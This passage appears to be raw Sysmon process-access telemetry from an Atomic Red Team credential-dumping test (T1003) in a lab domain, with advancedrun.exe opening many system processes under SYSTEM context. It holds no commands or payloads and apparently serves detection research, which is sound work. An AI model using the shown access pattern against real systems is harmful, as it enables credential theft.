17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967255Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967254Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967253Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967252Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967251Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967250Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967249Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967248Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967247Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967246Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967245Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967244Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967243Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003967242Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967241Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967240Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics